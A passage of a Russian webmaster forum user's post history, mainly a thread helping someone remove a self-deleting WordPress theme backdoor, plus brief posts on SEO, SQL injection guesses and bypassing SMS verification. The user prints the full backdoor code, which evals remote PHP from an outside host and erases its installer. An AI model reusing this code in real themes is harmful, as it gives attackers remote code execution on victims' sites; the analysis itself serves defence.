wlaam

Рейтинг
7
Регистрация
05.09.2011
Помогите с wordpress. Сложный "вирус". Не могу удалить.
goliafz:
У меня на разных шаблонах разный код кроме add_filter

Не знаю что там на других шаблонах. Я вам привел принцип действия на этом. Может в других по другому..... хз.

Как-то попытайтесь понять что сразу после установки шаблона. Вы тот код что я привел не увидите. Он тупо удаляется.

Вам нужно заново скачать любой шаблон с того сайта. И НЕ УСТАНАВЛИВАЯ ЕГО, открыть function.php. Тогда все сами поймете.

Тяжко жжж однако бывает :) Сейчас спецом скачал еще 3 шаба. Везде одно и тоже.

Помогите с wordpress. Сложный "вирус". Не могу удалить.
goliafz:
Код везде разный. Но с add_filter есть у всех.

Код не разный.

Просто та часть что я привел. Вырезается каждый раз, когда вызывается function.php. Загрузите шаблон , и не устанавливая его откройте function.php

//selfterminate
$functions = file_get_contents(TEMPLATEPATH.'/functions.php');
$p1 = substr($functions, 0, strpos($functions, '//beginXX'));
$p2 = end(explode('//endXX', $functions));
file_put_contents(TEMPLATEPATH.'/functions.php', $p1.$p2);

Та часть что вырезается. Центр управления ссылками (Насколько я понял):) Как я уже отметил. Задумка довольно интерестная.

Впринципе и не удивительно что вы ничего не заметили. если бы не eval....

з.ы Корень зла, тут :) http://wpru.ru

Помогите с wordpress. Сложный "вирус". Не могу удалить.
goliafz:
Только этот код сложно заметить. Да и непонятно, что он делает. Но по 1 слову в нем я сразу же догадался, что его тут не должно быть.

Что же вы весь код то не привели :)

<?php
//beginXX
add_action('after_setup_theme', '_theme_setup');
function _theme_setup(){
$value = 'return eval(file_get_contents(\'http://wpru.ru/aksimet.php?id=\'.$post->ID.\'&m=31&n\'));';
add_option('blogoption', $value, '', 'yes');
//selfterminate
$functions = file_get_contents(TEMPLATEPATH.'/functions.php');
$p1 = substr($functions, 0, strpos($functions, '//beginXX'));
$p2 = end(explode('//endXX', $functions));
file_put_contents(TEMPLATEPATH.'/functions.php', $p1.$p2);
}
//endXX
add_filter('the_content', '_bloginfo', 10001);
function _bloginfo($content){
global $post;
if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){
return $co;
} else return $content;
}
if ( function_exists('register_sidebar') )
register_sidebar();
?>
Diversant:
Красиво запрятали заразы

да и не прятали почти......

А вот идея неплохая :)

Как бороться с плагиаторами???
esys:
Есть такая штука как "блокнот"

А еще есть такие штуки как preg_match_all :), что к слову, гораздо продуктивнее чем "блокнот". Когда в обще ссылки в новостях были проблемой то ? И что за байка что автоматом грабят с какими-то нелепыми ссылками.

Все сайты полностью вылетели из яндекса. Но причины не вижу!!!
stier:
что после вылета всех страниц из Яндекса было 4 посещения с этого поисковика.

Кеш, не ? 10 разз

BodyClick - кидалы воруют WebMoney
GoldLife:
Почта эта только там указанна, в других сервисах, нигде такого пароля нет.

SQL Inject внутри аккаунтов. Blind SQL Inject. Как-то так. 8 символов мало. "Радужные таблицы" рулят. У меня 15.

Мог быть и простой "лобовой брут" по мылу. С последующими проверками по mini. И это не более чем совпадение.

И наконец уволенный сотрудник спер БД и теперь мелко пакостит.

Vigorin:
Выкладываю скрин

ТС - Фиии......

Актуально ли сейчас создавать сервис free доменов 3 уровня?
imho-no:
wlaam, насчет верификации - есть альтернативные способы отсечь доры и ГС?

Нет, нету.... да и не уверен, что и смс будет существенной помехой при условии что домены станут трастовыми. Лично обходил в свое время верификацию по смс у яндекса.

Да и получить пулл доступных тел. номеров для обхода, не особенно сложно.

imho-no:
вариантов масса. доработать Лайвстрит под свои нужды и тд.

Тут ничего не скажу. Так-как нет практики в этом вопросе..... возможно вы и правы.

Актуально ли сейчас создавать сервис free доменов 3 уровня?
imho-no:
1. если уровня блог.ру + плюшки + гарантиии и минус ограничения - почему нет?

Это какой выход на себестоимость то будет. ? :) С учетом рекламы, кластера, прогеров, админов.... etc.

imho-no:
3. если блоггер не нищеброд и у него есть рубль на смс - почему нет?

За смс будет платить сервис блогов скорее всего. Входящие смс - бесплатны.

Дорген - вирус
samobart:
в дорах получше парней разбирается

Намек на то что у девченок мозг чтоли меньше ? :)

Помогите с wordpress. Сложный "вирус". Не могу удалить.
goliafz:
Если не ошибаюсь, то такая же проблема была и на других сайтах на том же движке, но уже на другом хостере.

Что то все слишком загадочно :) Wp - последней версии. ? И в сети обсуждений по этому поводу я не нашел. Странно. Ссылки на ресурсы перечислите.

1 2345678910 11
Всего: 105